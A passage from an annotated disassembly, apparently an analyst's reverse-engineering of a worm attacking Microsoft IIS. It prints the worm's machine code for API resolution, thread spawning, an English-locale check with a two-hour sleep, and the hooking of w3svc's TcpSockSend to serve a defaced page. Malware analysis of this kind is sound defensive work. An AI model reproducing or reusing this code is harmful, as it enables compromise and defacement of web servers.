/>seg000:00000344<br />seg000:00000344 RVA_INNER_TOP: ; CODE XREF: DO_RVA+20Ej<br />seg000:00000344 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h] ; this moves on to the next func in an rva table<br />seg000:0000034A 83 C1 01 add ecx, 1 ; Add<br />seg000:0000034D 89 8D 48 FE FF FF mov [ebp-1B8h], ecx<br />seg000:00000353 8B 95 4C FE FF FF mov edx, [ebp-1B4h]<br />seg000:00000359 83 C2 04 add edx, 4 ; Add<br />seg000:0000035C 89 95 4C FE FF FF mov [ebp-1B4h], edx<br />seg000:00000362<br />seg000:00000362 RVA_PROCESS_FUNC: ; CODE XREF: DO_RVA+11Ej<br />seg000:00000362 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.<br />seg000:00000362 ;<br />seg000:00000368 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h]<br />seg000:0000036E 3B 48 18 cmp ecx, [eax+18h] ; Compare Two Operands<br />seg000:00000371 0F 8D C0 00 00 00 jge TO_RVA_TOP ; this is the end of the inside loop(there are no more functions), goto RVA top and try again.<br />seg000:00000377 8B 95 4C FE FF FF mov edx, [ebp-1B4h]<br />seg000:0000037D 8B 02 mov eax, [edx]<br />seg000:0000037F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]<br />seg000:00000385 81 3C 01 47 65 74+ cmp dword ptr [ecx+eax], 50746547h ; looking for GetProcAddr (PteG cmp)<br />seg000:0000038C 0F 85 A0 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.<br />seg000:00000392 8B 95 4C FE FF FF mov edx, [ebp-1B4h]<br />seg000:00000398 8B 02 mov eax, [edx]<br />seg000:0000039A 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]<br />seg000:000003A0 81 7C 01 04 72 6F+ cmp dword ptr [ecx+eax+4], 41636F72h ; looking for GetProcAddr (Acor cmp)<br />seg000:000003A8 0F 85 84 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.<br />seg000:000003AE 8B 95 48 FE FF FF mov edx, [ebp-1B8h] ; it did match this is GetPRocAddr, need to get the mapped RVA for this func.<br />seg000:000003B4 03 95 48 FE FF FF add edx, [ebp-1B8h] ; get offset into table and double it<br />seg000:000003BA 03 95 58 FE FF FF add edx, [ebp-1A8h] ; get RVA Base for Kernel32.dll<br />seg000:000003C0 8B 85 54 FE FF FF mov eax, [ebp-1ACh]<br />seg000:000003C6 8B 48 24 mov ecx, [eax+24h]<br />seg000:000003C9 33 C0 xor eax, eax ; NULL out eax<br />seg000:000003CB 66 8B 04 0A mov ax, [edx+ecx]<br />seg000:000003CF 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1B4 to offset into rva table<br />seg000:000003D5 8B 8D 54 FE FF FF mov ecx, [ebp-1ACh]<br />seg000:000003DB 8B 51 10 mov edx, [ecx+10h]<br />seg000:000003DE 8B 85 4C FE FF FF mov eax, [ebp-1B4h]<br />seg000:000003E4 8D 4C 10 FF lea ecx, [eax+edx-1] ; Load Effective Address<br />seg000:000003E8 89 8D 4C FE FF FF mov [ebp-1B4h], ecx<br />seg000:000003EE 8B 95 4C FE FF FF mov edx, [ebp-1B4h]<br />seg000:000003F4 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add<br />seg000:000003FA 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add<br />seg000:00000400 03 95 4C FE FF FF add edx, [ebp-1B4h] ; Add<br />seg000:00000406 03 95 58 FE FF FF add edx, [ebp-1A8h] ; Add<br />seg000:0000040C 8B 85 54 FE FF FF mov eax, [ebp-1ACh]<br />seg000:00000412 8B 48 1C mov ecx, [eax+1Ch]<br />seg000:00000415 8B 14 0A mov edx, [edx+ecx]<br />seg000:00000418 89 95 4C FE FF FF mov [ebp-1B4h], edx<br />seg000:0000041E 8B 85 4C FE FF FF mov eax, [ebp-1B4h]<br />seg000:00000424 03 85 58 FE FF FF add eax, [ebp-1A8h] ; Add<br />seg000:0000042A 89 85 70 FE FF FF mov [ebp-190h], eax ; set ebp-190 to GetProcAddr Address<br />seg000:00000430 EB 05 jmp short TO_RVA_TOP ; Jump<br />seg000:00000432 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000432<br />seg000:00000432 TO_RVA_INNER_TOP: ; CODE XREF: DO_RVA+168j<br />seg000:00000432 ; DO_RVA+184j<br />seg000:00000432 E9 0D FF FF FF jmp RVA_INNER_TOP ; this moves on to the next func in an rva table<br />seg000:00000437 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000437<br />seg000:00000437 TO_RVA_TOP: ; CODE XREF: DO_RVA+73j<br />seg000:00000437 ; DO_RVA+94j ...<br />seg000:00000437 E9 16 FE FF FF jmp RVA_TOP ; this is null on the first loop through, due to a null set at init.<br />seg000:00000437 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN<br />seg000:0000043C ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:0000043C<br />seg000:0000043C GETPROC_LOADED: ; CODE XREF: DO_RVA+35j<br />seg000:0000043C 8D BD F0 FE FF FF lea edi, [ebp-110h] ; Load Effective Address<br />seg000:00000442 8B 47 08 mov eax, [edi+8]<br />seg000:00000445 64 A3 00 00 00 00 mov large fs:0, eax<br />seg000:0000044B 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; see if getprocaddr is loaded<br />seg000:00000452 75 05 jnz short GPLOADED2 ; if it is, goto gploaded2<br />seg000:00000454 E9 38 08 00 00 jmp TIGHT_LOOP ; else, goto locC91<br />seg000:00000459 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000459<br />seg000:00000459 GPLOADED2: ; CODE XREF: DO_RVA+22Ej<br />seg000:00000459 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 1 ; set ebp-1b4 to 1<br />seg000:00000463 EB 0F jmp short GETPROC_LOOP_TOP ; load edx with the data segment<br />seg000:00000465 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000465<br />seg000:00000465 GETPROC_LOOP_INC: ; CODE XREF: DO_RVA+2E9j<br />seg000:00000465 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; increment the counter at ebp-ib4<br />seg000:0000046B 83 C1 01 add ecx, 1 ; Add<br />seg000:0000046E 89 8D 4C FE FF FF mov [ebp-1B4h], ecx<br />seg000:00000474<br />seg000:00000474 GETPROC_LOOP_TOP: ; CODE XREF: DO_RVA+23Fj<br />seg000:00000474 8B 95 68 FE FF FF mov edx, [ebp-198h] ; load edx with the data segment<br />seg000:0000047A 0F BE 02 movsx eax, byte ptr [edx] ; move the byte at data segment to eax<br />seg000:0000047D 85 C0 test eax, eax ; check if the byte is null. This signifies the end of the function data section.<br />seg000:0000047F 0F 84 8D 00 00 00 jz FUNC_LOAD_DONE ; if it is, go here<br />seg000:00000485 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; load ecx with the data segment<br />seg000:0000048B 0F BE 11 movsx edx, byte ptr [ecx] ; load edx wuith the byte at data segment<br />seg000:0000048E 83 FA 09 cmp edx, 9 ; check if the byte specifies change of dll<br />seg000:00000491 75 21 jnz short loc_4B4 ; if not, jump here<br />seg000:00000493 8B 85 68 FE FF FF mov eax, [ebp-198h] ; set eax to current data pointer<br />seg000:00000499 83 C0 01 add eax, 1 ; get past the 9<br />seg000:0000049C 8B F4 mov esi, esp<br />seg000:0000049E 50 push eax ; push current data pointer<br />seg000:0000049F FF 95 90 FE FF FF call dword ptr [ebp-170h] ; LoadLibraryA<br />seg000:000004A5 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000004A7 90 nop ; No Operation<br />seg000:000004A8 43 inc ebx ; Increment by 1<br />seg000:000004A9 4B dec ebx ; Decrement by 1<br />seg000:000004AA 43 inc ebx ; Increment by 1<br />seg000:000004AB 4B dec ebx ; Decrement by 1<br />seg000:000004AC 89 85 34 FE FF FF mov [ebp-1CCh], eax ; load current dll base pointer with return from LoadLibraryA<br />seg000:000004B2 EB 2A jmp short DLL_CHECK_NULL_BRANCH ; Jump<br />seg000:000004B4 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000004B4<br />seg000:000004B4 loc_4B4: ; CODE XREF: DO_RVA+26Dj<br />seg000:000004B4 8B F4 mov esi, esp<br />seg000:000004B6 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; set ecx with the data segment pointer<br />seg000:000004BC 51 push ecx ; push data segment(pointer of function to load)<br />seg000:000004BD 8B 95 34 FE FF FF mov edx, [ebp-1CCh] ; get current RVA base offset<br />seg000:000004C3 52 push edx ; push module handle(base loaded address)<br />seg000:000004C4 FF 95 70 FE FF FF call dword ptr [ebp-190h] ; call GetProcAddress<br />seg000:000004CA 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000004CC 90 nop ; No Operation<br />seg000:000004CD 43 inc ebx ; Increment by 1<br />seg000:000004CE 4B dec ebx ; Decrement by 1<br />seg000:000004CF 43 inc ebx ; Increment by 1<br />seg000:000004D0 4B dec ebx ; Decrement by 1<br />seg000:000004D1 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; load ecx with ebp-1b4<br />seg000:000004D7 89 84 8D 8C FE FF+ mov [ebp+ecx*4-174h], eax ; load the address into the ebp stack where needed<br />seg000:000004D7 FF ; this sets up our function jumptable<br />seg000:000004DE<br />seg000:000004DE DLL_CHECK_NULL_BRANCH: ; CODE XREF: DO_RVA+28Ej<br />seg000:000004DE EB 0F jmp short CHECK_NULL_BRANCH ; load eax with data segment.<br />seg000:000004DE ;<br />seg000:000004DE ; this checks the nullishness of the ebp-198 data pointer, and if isn't null, increments it.<br />seg000:000004E0 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000004E0<br />seg000:000004E0 CHECK_NULL_BRANCH_INC: ; CODE XREF: DO_RVA+2D8j<br />seg000:000004E0 8B 95 68 FE FF FF mov edx, [ebp-198h] ; this function moves the data segment on to the next lookup<br />seg000:000004E6 83 C2 01 add edx, 1 ; Add<br />seg000:000004E9 89 95 68 FE FF FF mov [ebp-198h], edx<br />seg000:000004EF<br />seg000:000004EF CHECK_NULL_BRANCH: ; CODE XREF: DO_RVA+2BAj<br />seg000:000004EF 8B 85 68 FE FF FF mov eax, [ebp-198h] ; load eax with data segment.<br />seg000:000004EF ;<br />seg000:000004EF ; this checks the nullishness of the ebp-198 data pointer, and if isn't null, increments it.<br />seg000:000004F5 0F BE 08 movsx ecx, byte ptr [eax] ; load byte at eax into ecx<br />seg000:000004F8 85 C9 test ecx, ecx ; check for null<br />seg000:000004FA 74 02 jz short GETPROC_SHIFT_NULL ; if it is null, go here<br />seg000:000004FC EB E2 jmp short CHECK_NULL_BRANCH_INC ; else go here<br />seg000:000004FE ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000004FE<br />seg000:000004FE GETPROC_SHIFT_NULL: ; CODE XREF: DO_RVA+2D6j<br />seg000:000004FE 8B 95 68 FE FF FF mov edx, [ebp-198h] ; this function moves past the null on the end of a line to set the function up for the next run through the getproc/load library system<br />seg000:00000504 83 C2 01 add edx, 1 ; Add<br />seg000:00000507 89 95 68 FE FF FF mov [ebp-198h], edx<br />seg000:0000050D E9 53 FF FF FF jmp GETPROC_LOOP_INC ; increment the counter at ebp-ib4<br />seg000:00000512 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000512<br />seg000:00000512 FUNC_LOAD_DONE: ; CODE XREF: DO_RVA+25Bj<br />seg000:00000512 8B 85 68 FE FF FF mov eax, [ebp-198h] ; set eax to the data segment<br />seg000:00000518 83 C0 01 add eax, 1 ; inc eax<br />seg000:0000051B 89 85 68 FE FF FF mov [ebp-198h], eax ; set datasegment to eax<br />seg000:0000051B ;<br />seg000:0000051B ; This moves us past the final NULL at the end of the Dll Listing<br />seg000:00000521 8B 4D 08 mov ecx, [ebp+8] ; load ecx with an address at ebp+8<br />seg000:00000524 8B 91 84 00 00 00 mov edx, [ecx+84h] ; load edx with a wam.dll entry<br />seg000:0000052A 89 95 6C FE FF FF mov [ebp-194h], edx ; load this wam.dll entry into ebp-194<br />seg000:00000530 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 4 ; set ebp-1b4 to 4<br />seg000:0000053A C6 85 D0 FE FF FF+ mov byte ptr [ebp-130h], 68h ; 'h' ; set ebp-130 to 68h<br />seg000:0000053A 68 ;<br />seg000:0000053A ; this seems to be setting up some type of structure<br />seg000:00000541 8B 45 08 mov eax, [ebp+8] ; load eax with ebp+8(possibly an isapi request struct)<br />seg000:00000544 89 85 D1 FE FF FF mov [ebp-12Fh], eax ; save the ebp+8 at ebp-12f<br />seg000:0000054A C7 85 D5 FE FF FF+ mov dword ptr [ebp-12Bh], 0FF53535Bh<br />seg000:00000554 C7 85 D9 FE FF FF+ mov dword ptr [ebp-127h], 90907863h<br />seg000:0000055E 8B 4D 08 mov ecx, [ebp+8] ; check pointer to the possible isapi struct<br />seg000:00000561 8B 51 10 mov edx, [ecx+10h]<br />seg000:00000564 89 95 50 FE FF FF mov [ebp-1B0h], edx ; set response to check at ebp-1b0<br />seg000:0000056A 83 BD 50 FE FF FF+ cmp dword ptr [ebp-1B0h], 0 ; Compare Two Operands<br />seg000:00000571 75 26 jnz short loc_599 ; if it's not 0, then go here<br />seg000:00000573 8B F4 mov esi, esp ; Get Ready to call a function<br />seg000:00000575 6A 00 push 0 ; push a null<br />seg000:00000577 8D 85 4C FE FF FF lea eax, [ebp-1B4h] ; load eax to the addr of ebp-1b4, set to 4<br />seg000:0000057D 50 push eax ; push the addr on the stack<br />seg000:0000057E 8B 8D 68 FE FF FF mov ecx, [ebp-198h] ; load eax to the addr of ebp-198, set to data segment right after the funcnames<br />seg000:00000584 51 push ecx ; push it<br />seg000:00000585 8B 55 08 mov edx, [ebp+8] ; set edx with ebp+8 pointer<br />seg000:00000588 8B 42 08 mov eax, [edx+8] ; load eax with the data at edx+8<br />seg000:0000058B 50 push eax ; push eax<br />seg000:0000058C FF 95 6C FE FF FF call dword ptr [ebp-194h] ; call WriteClient in WAM<br />seg000:00000592 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000594 90 nop ; No Operation<br />seg000:00000595 43 inc ebx ; Increment by 1<br />seg000:00000596 4B dec ebx ; Decrement by 1<br />seg000:00000597 43 inc ebx ; Increment by 1<br />seg000:00000598 4B dec ebx ; Decrement by 1<br />seg000:00000599<br />seg000:00000599 loc_599: ; CODE XREF: DO_RVA+34Dj<br />seg000:00000599 83 BD 50 FE FF FF+ cmp dword ptr [ebp-1B0h], 64h ; 'd' ; check is 64 is in ebp-1b0<br />seg000:000005A0 7D 5C jge short TOO_MANY_THREADS ; branch here if more than 100 are running<br />seg000:000005A2 8B 8D 50 FE FF FF mov ecx, [ebp-1B0h] ; set ecx to number of threads<br />seg000:000005A8 83 C1 01 add ecx, 1 ; increment the number of open threads<br />seg000:000005AB 89 8D 50 FE FF FF mov [ebp-1B0h], ecx ; store the new value of threadcount<br />seg000:000005B1 8B 95 50 FE FF FF mov edx, [ebp-1B0h] ; set thread count into edx<br />seg000:000005B7 69 D2 8D 66 F0 50 imul edx, 50F0668Dh ; Signed Multiply<br />seg000:000005BD 89 95 74 FE FF FF mov [ebp-18Ch], edx ; store the new val at ebp-18c<br />seg000:000005C3 8B 45 08 mov eax, [ebp+8] ; load eax with the isapi extension block<br />seg000:000005C6 8B 8D 50 FE FF FF mov ecx, [ebp-1B0h] ; load ecx with the threadcount<br />seg000:000005CC 89 48 10 mov [eax+10h], ecx ; store threadcount in the isapi extension block<br />seg000:000005CF 8B F4 mov esi, esp<br />seg000:000005D1 8D 95 2C FE FF FF lea edx, [ebp-1D4h] ; Load Effective Address<br />seg000:000005D7 52 push edx ; LPDWORD lpThreadId // thread identifier<br />seg000:000005D8 6A 00 push 0 ; DWORD dwCreationFlags // creation option<br />seg000:000005DA 8D 85 4C FE FF FF lea eax, [ebp-1B4h] ; Load Effective Address<br />seg000:000005E0 50 push eax ; LPVOID lpParameter // thread argument<br />seg000:000005E1 8D 8D D0 FE FF FF lea ecx, [ebp-130h] ; Load Effective Address<br />seg000:000005E7 51 push ecx ; LPTHREAD_START_ROUTINE lpStartAddress // thread function<br />seg000:000005E8 6A 00 push 0 ; DWORD dwStackSize // initial stack size<br />seg000:000005EA 6A 00 push 0 ; LPSECURITY_ATTRIBUTES lpThreadAttributes // SD<br />seg000:000005EC FF 95 98 FE FF FF call dword ptr [ebp-168h] ; CreateThread<br />seg000:000005F2 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000005F4 90 nop ; No Operation<br />seg000:000005F5 43 inc ebx ; Increment by 1<br />seg000:000005F6 4B dec ebx ; Decrement by 1<br />seg000:000005F7 43 inc ebx ; Increment by 1<br />seg000:000005F8 4B dec ebx ; Decrement by 1<br />seg000:000005F9 E9 9F 01 00 00 jmp DO_THE_WORK ; this exits from sub 224, not positive of the end result.<br />seg000:000005FE ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000005FE<br />seg000:000005FE TOO_MANY_THREADS: ; CODE XREF: DO_RVA+37Cj<br />seg000:000005FE 8B F4 mov esi, esp ; setup a func<br />seg000:00000600 FF 95 A4 FE FF FF call dword ptr [ebp-15Ch] ; GetSystemDefaultLangId<br />seg000:00000606 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000608 90 nop ; No Operation<br />seg000:00000609 43 inc ebx ; Increment by 1<br />seg000:0000060A 4B dec ebx ; Decrement by 1<br />seg000:0000060B 43 inc ebx ; Increment by 1<br />seg000:0000060C 4B dec ebx ; Decrement by 1<br />seg000:0000060D 89 85 4C FE FF FF mov [ebp-1B4h], eax ; put default system languageid in ebp-1b4<br />seg000:00000613 8B 95 4C FE FF FF mov edx, [ebp-1B4h]<br />seg000:00000619 81 E2 FF FF 00 00 and edx, 0FFFFh ; Logical AND<br />seg000:0000061F 89 95 4C FE FF FF mov [ebp-1B4h], edx<br />seg000:00000625 81 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 409h ; Compare Two Operands<br />seg000:0000062F 74 05 jz short IS_AMERICAN ; if not english go<br />seg000:00000631 E9 67 01 00 00 jmp DO_THE_WORK ; this exits from sub 224, not positive of the end result.<br />seg000:00000636 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000636<br />seg000:00000636 IS_AMERICAN: ; CODE XREF: DO_RVA+40Bj<br />seg000:00000636 8B F4 mov esi, esp<br />seg000:00000638 68 00 DD 6D 00 push 6DDD00h ; this is 2 hours<br />seg000:0000063D FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:0000063D ;<br />seg000:0000063D ; This Sleeps for 2 hours<br />seg000:00000643 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000645 90 nop ; No Operation<br />seg000:00000646 43 inc ebx ; Increment by 1<br />seg000:00000647 4B dec ebx ; Decrement by 1<br />seg000:00000648 43 inc ebx ; Increment by 1<br />seg000:00000649 4B dec ebx ; Decrement by 1<br />seg000:0000064A E9 80 06 00 00 jmp HACK_PAGE_JUMP ; this sets up the hacked page bit<br />seg000:0000064A DO_RVA endp<br />seg000:0000064A<br />seg000:0000064F<br />seg000:0000064F ; ۛۛۛۛۛۛۛ۠S U B R O U T I N E ۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۍ<br />seg000:0000064F<br />seg000:0000064F ; pop the stack into the counter<br />seg000:0000064F<br />seg000:0000064F HACK_PAGE proc near ; CODE XREF: seg000:00000CCFp<br />seg000:0000064F 8F 85 4C FE FF FF pop dword ptr [ebp-1B4h]<br />seg000:00000655 8B 85 34 FE FF FF mov eax, [ebp-1CCh] ; load eax with the current dll base address(probably w3svc)<br />seg000:0000065B 89 85 CC FE FF FF mov [ebp-134h], eax ; store base at ebp-134<br />seg000:00000661 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; load thecounter into ecx<br />seg000:00000667 8B 95 B0 FE FF FF mov edx, [ebp-150h] ; load edx with tcpsocksend<br />seg000:0000066D 89 11 mov [ecx], edx ; store tcpsocksend at the address popped from the stack<br />seg000:0000066F 8B 85 4C FE FF FF mov eax, [ebp-1B4h] ; load eax with the address popped from the stack<br />seg000:00000675 8B 8D C8 FE FF FF mov ecx, [ebp-138h] ; load ecx with close socket<br />seg000:0000067B 89 48 04 mov [eax+4], ecx ; the next addr after the one popped is replaced with closesocket<br />seg000:0000067E 8B 95 68 FE FF FF mov edx, [ebp-198h] ; store data pointer in edx<br />seg000:00000684 89 95 50 FE FF FF mov [ebp-1B0h], edx ; store data pointer at ebp-1b0<br />seg000:0000068A EB 0F jmp short GET_HTML ; Jump<br />seg000:0000068C ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:0000068C<br />seg000:0000068C GET_HTML_INC: ; CODE XREF: HACK_PAGE+70j<br />seg000:0000068C 8B 85 50 FE FF FF mov eax, [ebp-1B0h] ; Get the next byte to compare to<br />seg000:00000692 83 C0 01 add eax, 1 ; Add<br />seg000:00000695 89 85 50 FE FF FF mov [ebp-1B0h], eax<br />seg000:0000069B<br />seg000:0000069B GET_HTML: ; CODE XREF: HACK_PAGE+3Bj<br />seg000:0000069B 8B 8D 68 FE FF FF mov ecx, [ebp-198h]<br />seg000:000006A1 81 C1 00 01 00 00 add ecx, 100h ; Add<br />seg000:000006A7 39 8D 50 FE FF FF cmp [ebp-1B0h], ecx ; compare shifted URL to HTML<br />seg000:000006AD 73 12 jnb short FOUND_HTML ; load eax with the data segment<br />seg000:000006AF 8B 95 50 FE FF FF mov edx, [ebp-1B0h]<br />seg000:000006B5 81 3A 4C 4D 54 48 cmp dword ptr [edx], 48544D4Ch ; look for HTML<br />seg000:000006BB 75 02 jnz short GET_HTML_INC_JUMP ; Jump if Not Zero (ZF=0)<br />seg000:000006BD EB 02 jmp short FOUND_HTML ; load eax with the data segment<br />seg000:000006BF ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000006BF<br />seg000:000006BF GET_HTML_INC_JUMP: ; CODE XREF: HACK_PAGE+6Cj<br />seg000:000006BF EB CB jmp short GET_HTML_INC ; Get the next byte to compare to<br />seg000:000006C1 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:000006C1<br />seg000:000006C1 FOUND_HTML: ; CODE XREF: HACK_PAGE+5Ej<br />seg000:000006C1 ; HACK_PAGE+6Ej<br />seg000:000006C1 8B 85 50 FE FF FF mov eax, [ebp-1B0h] ; load eax with the data segment<br />seg000:000006C7 83 C0 04 add eax, 4 ; Add<br />seg000:000006CA 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; set ecx with the counter<br />seg000:000006D0 89 41 08 mov [ecx+8], eax<br />seg000:000006D3 8B F4 mov esi, esp ; move the web data into the request return<br />seg000:000006D5 8D 95 48 FE FF FF lea edx, [ebp-1B8h] ; Load Effective Address<br />seg000:000006DB 52 push edx ; set ebp-1b8 to receive the old page protection<br />seg000:000006DC 6A 04 push 4 ; make page readwrte<br />seg000:000006DE 68 00 40 00 00 push 4000h ; for 4000 hex bytes<br />seg000:000006E3 8B 85 CC FE FF FF mov eax, [ebp-134h] ; stored write address for w3svc<br />seg000:000006E9 50 push eax<br />seg000:000006EA FF 95 A8 FE FF FF call dword ptr [ebp-158h] ; VirtualProtect<br />seg000:000006F0 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:000006F2 90 nop ; No Operation<br />seg000:000006F3 43 inc ebx ; Increment by 1<br />seg000:000006F4 4B dec ebx ; Decrement by 1<br />seg000:000006F5 43 inc ebx ; Increment by 1<br />seg000:000006F6 4B dec ebx ; Decrement by 1<br />seg000:000006F7 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; reset counter to 0<br />seg000:00000701 EB 0F jmp short TCPSOCKSEND_FIND ; check if counter is 3000h yet<br />seg000:00000703 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000703<br />seg000:00000703 TCPSOCKSEND_FIND_INC: ; CODE XREF: HACK_PAGE+123j<br />seg000:00000703 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h]<br />seg000:00000709 83 C1 01 add ecx, 1 ; Add<br />seg000:0000070C 89 8D 4C FE FF FF mov [ebp-1B4h], ecx<br />seg000:00000712<br />seg000:00000712 TCPSOCKSEND_FIND: ; CODE XREF: HACK_PAGE+B2j<br />seg000:00000712 81 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 3000h ; check if counter is 3000h yet<br />seg000:0000071C 7D 56 jge short RESET_MEM_PROTECTION ; go here if it is<br />seg000:0000071E 8B 95 CC FE FF FF mov edx, [ebp-134h] ; set edx to the base<br />seg000:00000724 03 95 4C FE FF FF add edx, [ebp-1B4h] ; add the offset from counter<br />seg000:0000072A 8B 02 mov eax, [edx] ; store the value at the offset into eax<br />seg000:0000072C 3B 85 B0 FE FF FF cmp eax, [ebp-150h] ; check ebp-150 against eax(tcpsocksend)<br />seg000:00000732 75 3E jnz short TCPSOCKSEND_FIND_INC_JUMP ; jump here on a not match<br />seg000:00000734 8B 8D CC FE FF FF mov ecx, [ebp-134h] ; load base into ecx<br />seg000:0000073A 03 8D 4C FE FF FF add ecx, [ebp-1B4h] ; set ecx to the address of tcpsocksend<br />seg000:00000740 8B 95 60 FE FF FF mov edx, [ebp-1A0h] ; set edx to o.C98<br />seg000:00000746 89 11 mov [ecx], edx ; replace the call to TCPSOCKSEND to o.C98<br />seg000:00000748 8B F4 mov esi, esp<br />seg000:0000074A 68 00 51 25 02 push 2255100h ; sleep for a long time<br />seg000:0000074F FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep<br />seg000:00000755 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000757 90 nop ; No Operation<br />seg000:00000758 43 inc ebx ; Increment by 1<br />seg000:00000759 4B dec ebx ; Decrement by 1<br />seg000:0000075A 43 inc ebx ; Increment by 1<br />seg000:0000075B 4B dec ebx ; Decrement by 1<br />seg000:0000075C 8B 85 CC FE FF FF mov eax, [ebp-134h] ; set eax to the base of the loaded dll<br />seg000:00000762 03 85 4C FE FF FF add eax, [ebp-1B4h] ; set eax to actual address of tcpsocksend<br />seg000:00000768 8B 8D B0 FE FF FF mov ecx, [ebp-150h] ; set ecx to tcpsocksend<br />seg000:0000076E 89 08 mov [eax], ecx ; replace the call to tcpsocksend with the original<br />seg000:00000770 EB 02 jmp short RESET_MEM_PROTECTION ; RESET_MEM_PROTECTION<br />seg000:00000772 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000772<br />seg000:00000772 TCPSOCKSEND_FIND_INC_JUMP: ; CODE XREF: HACK_PAGE+E3j<br />seg000:00000772 EB 8F jmp short TCPSOCKSEND_FIND_INC ; Jump<br />seg000:00000774 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br />seg000:00000774<br />seg000:00000774 RESET_MEM_PROTECTION: ; CODE XREF: HACK_PAGE+CDj<br />seg000:00000774 ; HACK_PAGE+121j<br />seg000:00000774 8B F4 mov esi, esp ; RESET_MEM_PROTECTION<br />seg000:00000776 8D 95 4C FE FF FF lea edx, [ebp-1B4h] ; Load Effective Address<br />seg000:0000077C 52 push edx<br />seg000:0000077D 8B 85 48 FE FF FF mov eax, [ebp-1B8h]<br />seg000:00000783 50 push eax<br />seg000:00000784 68 00 40 00 00 push 4000h<br />seg000:00000789 8B 8D CC FE FF FF mov ecx, [ebp-134h]<br />seg000:0000078F 51 push ecx<br />seg000:00000790 FF 95 A8 FE FF FF call dword ptr [ebp-158h] ; VirtualProtect<br />seg000:00000796 3B F4 cmp esi, esp ; Compare Two Operands<br />seg000:00000798 90 nop ; No Operation<br />seg000:00000799 43 inc ebx ; Increment by 1<br />seg000:0000079A 4B dec ebx ; Decrement by 1<br />seg000:0000079B 43 inc ebx ; Increment by 1<br />seg000:0000079C 